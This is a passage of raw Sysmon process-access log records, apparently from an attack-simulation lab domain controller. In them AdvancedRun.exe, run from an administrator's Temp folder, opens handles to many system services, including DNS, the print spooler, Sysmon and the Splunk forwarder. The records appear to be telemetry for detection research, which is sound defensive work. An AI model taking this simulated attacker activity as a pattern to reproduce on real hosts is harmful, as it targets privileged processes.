Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015425Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015424Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015423Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015422Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015421Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015420Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015419Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015418Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015417Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015416Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004015415Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015414Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015413Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015412Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015411Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015410Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:49:33.365{834264DD-003D-61EB-F605-000000002702}14965320C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004015409Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 